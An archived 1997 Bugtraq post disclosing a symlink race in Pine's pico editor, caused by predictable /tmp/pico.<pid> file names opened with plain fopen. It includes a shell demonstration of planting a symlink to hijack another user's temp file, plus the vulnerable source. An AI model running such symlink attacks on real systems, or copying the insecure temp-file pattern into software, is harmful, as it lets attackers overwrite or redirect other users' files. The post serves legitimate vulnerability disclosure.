Bugtraq mailing list archives
Pine has a few more problems...
From: dynamo () IME NET (dynamo () IME NET)
Date: Tue, 2 Sep 1997 01:23:52 -0400
Hey all, Since youre discussing pine, and its problems, here is something i found while reading through the source for pico, the editor in pine. It seems that there is a race condition here in the routines it uses to make temporary files. Cheers, dynamo ps: floydy, get to bed. you shouldnt be working at this hour. here's the problem in action: bring# ps axO user | grep pico 10420 notlumpy p4 I+ 0:00.04 pico 10366 lumpy p5 I+ 0:00.03 pico -w blahblah bring# ln -s mark.sucks pico.10420 bring# ls -l total 561 -rw-r--r-- 1 lumpy wheel 562100 Sep 1 19:34 L74874TMP.gz lrwxrwxrwt 1 root wheel 10 Sep 2 01:20 pico.10420 -> mark.sucks drwxr-xr-x 3 root wheel 512 Aug 30 21:38 screens (at this point in another window i did a spell check, one function that calls writetmp) bring# ls -l total 562 -rw-r--r-- 1 lumpy wheel 562100 Sep 1 19:34 L74874TMP.gz -rw------- 1 notlumpy wheel 60 Sep 2 01:20 mark.sucks drwxr-xr-x 3 root wheel 512 Aug 30 21:38 screens bring# here are some code snippets: os_unix.c ffwopen ----------------- /* * Open a file for writing. Return TRUE if all is well, and FALSE on error * (cannot create). */ ffwopen(fn) char *fn; { extern FILE *ffp; if ((ffp=fopen(fn, "w")) == NULL) { emlwrite("Cannot open file for writing", NULL); return (FIOERR); } ----------------- os_unix.c tmpname ----------------- /* * tmpname - return a temporary file name in the given buffer */ void tmpname(name) char *name; { sprintf(name, "/tmp/pico.%d", getpid()); /* tmp file name */ } ----------------- file.c writetmp ----------------- * writetmp - write a temporary file for message text, mindful of * access restrictions and included text. If n is true, include * lines that indicated included message text, otw forget them */ char *writetmp(f, n) int f, n; { static char fn[NFILEN]; register int s; register LINE *lp; register int nline; tmpname(fn); if ((s=ffwopen(fn)) != FIOSUC) /* Open writes message. */ return(NULL); (code continues...) -----------------
Current thread:
- in.comsat DoS vulnerability, (continued)
- in.comsat DoS vulnerability Andrew Hobgood (Sep 02)
- You can find jizz.c here T o r g (Sep 03)
- You can find jizz.c here anonymous () ANONYMOUS ORG (Sep 03)
- [linux-security] Announce: chkexploit 1.13 (fwd) iON BARRiER (Sep 04)
- Re: [linux-security] Announce: chkexploit 1.13 (fwd) W.C. Epperson (Sep 04)
- [Alert] Website's uploader.exe (from demo) vulnerable Aleph One (Sep 04)
- Overflow in one of Apache 1.1.1 (maybe later too)'s modules Matt Conover (Sep 04)
- Re: Overflow in one of Apache 1.1.1 (maybe later too)'s modules Artur Pydo - EuroBretagne (Sep 05)
- Re: Overflow in one of Apache 1.1.1 (maybe later too)'s modules Marc Slemko (Sep 05)
- Announcement: Phrack 51 Nate (Sep 01)
- Pine has a few more problems... dynamo () IME NET (Sep 01)
- SNI-18: Vacation Vulnerability Secure Networks Inc. (Sep 01)
- SNI-18: Vacation Vulnerability ggajic () FREENET NETHER NET (Sep 02)